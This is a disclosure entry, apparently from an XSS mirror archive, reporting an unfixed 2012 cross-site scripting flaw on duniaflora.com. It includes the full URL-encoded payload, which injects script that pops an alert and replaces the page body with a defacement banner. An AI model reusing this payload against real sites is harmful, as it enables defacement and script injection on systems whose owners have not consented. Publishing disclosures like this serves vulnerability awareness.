Security researcher xwungu, has submitted on 15/02/2012 a cross-site-scripting (XSS) vulnerability affecting duniaflora.com, which at the time of submission ranked 3922495 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/02/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 15/02/2012 |
Date published: 16/02/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: xwungu |
Domain: duniaflora.com |
Category: XSS |
Pagerank: 3922495 |
URL: http://duniaflora.com/mod.php?mod=iklanbaris&op=search&query=http://www.bulutangkis.com/mod.php?mod= publisher&op=search&query=%22%3E%3C%2FscRipT%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%3Cscr ipt%3Edocument.body.innerHTML%3D%22%3Cstyle%3Ebody{visibility%3Ahidden%3B+background%3Ablack%3B}%3C% 2Fstyle%3E%3Cdiv+style%3Dvisibility%3Avisible%3B%3E%3Ccenter%3E%3Ch1%3E%3Cfont+color%3D%27white%27%3 EXSS+Test+By+%3C%2Ffont%3E%3Cfont+color%3D%27red%27%3EEmily.Josan%3C%2Ffont%3E%3Cfont+color%3D%27whi te%27%3E!%3C%2Ffont%3E%3C%2Fh1%3E%3Cfont+color%3D%27white%27%3E%402012%3Ch1%3E%3Cfont+color%3D%27333 333%27%3E+example+for+xss%3C%2Ffont%3E%3C%2Fh1%3E%3Cbr%3E%22%3B%3C%2Fscript%3E |
Click here to view the mirror
|
|
|